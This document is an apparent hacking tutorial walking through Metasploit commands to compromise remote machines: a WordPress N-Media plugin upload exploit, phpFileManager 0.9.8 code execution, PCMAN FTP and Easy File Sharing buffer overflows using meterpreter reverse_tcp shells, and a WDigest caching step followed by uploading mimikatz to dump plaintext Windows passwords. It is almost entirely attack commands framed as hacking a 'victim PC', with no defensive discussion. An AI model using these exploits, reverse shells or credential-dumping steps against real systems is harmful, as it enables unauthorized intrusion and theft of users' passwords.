Hack Remote PC using WordPress N-Media Website Contact Form with File Upload Vulnerability

This module exploits an arbitrary PHP code upload in the WordPress N-Media Website Contact Form plugin, version 1.3.4. The vulnerability allows for arbitrary file upload and remote code execution.

Exploit Targets

WordPress N-Media Website Contact Form plugin

Requirement

Attacker: kali Linux

Victim PC: Wordpress Installed

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_nmediawebsite_file_upload

msf exploit (wp_nmediawebsite_file_upload)>set targeturi http://192.168.0.110/wordpress

msf exploit (wp_nmediawebsite_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_nmediawebsite_file_upload)>set rport 80

msf exploit (wp_nmediawebsite_file_upload)>exploit   

Hack Remote Linux PC using PHPFilemanager 0.9.8 Remote Code Execurion

This module exploits remote code execution vulnerability in phpFileManager 0.9.8 which is a filesystem management tool on a single file.

Exploit Targets

phpFileManager 0.9.8

Requirement

Attacker: kali Linux

Victim PC: Linux

Open Kali terminal type msfconsole

Now type use exploit/multi/http/phpfilemanager_rce

msf exploit (phpfilemanager_rce)>set targeturi /phpfilemanager-0.9.8/index.php

msf exploit (phpfilemanager_rce)>set rhost 192.168.0.119 (IP of Remote Host)

msf exploit (phpfilemanager_rce)>exploit  

Hack Remote Windows PC using PCMAN FTP Server Buffer Overflow - PUT Command

This module exploits a buffer overflow vulnerability found in the PUT command of the PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous credentials are enabled...

Exploit Targets

PCMAN FTP v2.0.7 Server

Requirement

Attacker: kali Linux

Victim PC: Windows XP SP 3

Most Easy File Sharing FTP Server run on port 21 so in order to discover information regarding the PCMan FTP Server we need to execute the following script:

Nmap  -sV 192.168.0.127

Open Kali terminal type msfconsole

Now type use exploit/windows/ftp/pcman_put

msf exploit (pcman_put)>set payload windows/meterpreter/reverse_tcp

msf exploit (pcman_put)>)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (pcman_put)>)>set rhost 192.168.0.127

msf exploit (pcman_put)>)>set port 21

msf exploit (pcman_put)>)>exploit  

Hack Remote Windows PC using Easy File Sharing HTTP Server 7.2 SEH Overflow

This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software

Exploit Targets

Easy File Sharing FTP Server 7.2

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Most Easy File Sharing FTP Server run on port 80 or 8080 so in order to discover information regarding the Easy File Sharing FTP Server we need to execute the following script:

Nmap  -sV 192.168.0.103

Open Kali terminal type msfconsole

Now type use exploit/windows/http/easyfilesharing_seh

msf exploit (easyfilesharing_seh)>set payload windows/meterpreter/reverse_tcp

msf exploit (easyfilesharing_seh)>set lhost 192.168.0.119 (IP of Local Host)

msf exploit (easyfilesharing_seh)>set rhost 192.168.0.103

msf exploit (easyfilesharing_seh)>set rport 8080

msf exploit (easyfilesharing_seh)>exploit  

Hack Remote Windows 10 Password in Plain Text using Wdigest Credential Caching Exploit

On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key. Any subsequest logins will allow mimikatz to recover the plain text passwords from the system's memory.

Exploit Targets

Windows 10

Requirement

Attacker: kali Linux

Victim PC: Windows 10

Open Kali terminal type msfconsole

Now type use post/windows/manage/wdigest_caching

msf exploit (wdigest_caching)>set session 1

msf exploit (wdigest_caching)>exploit

 To send mimikatz file to the target system using following command

Upload /usr/share/mimikatz/x64/mimikatz.exe e:\\

Type the following command to check privilege

privilege::debug

Then type the following command to get users passwords in text mode.

sekurlsa::logonPassword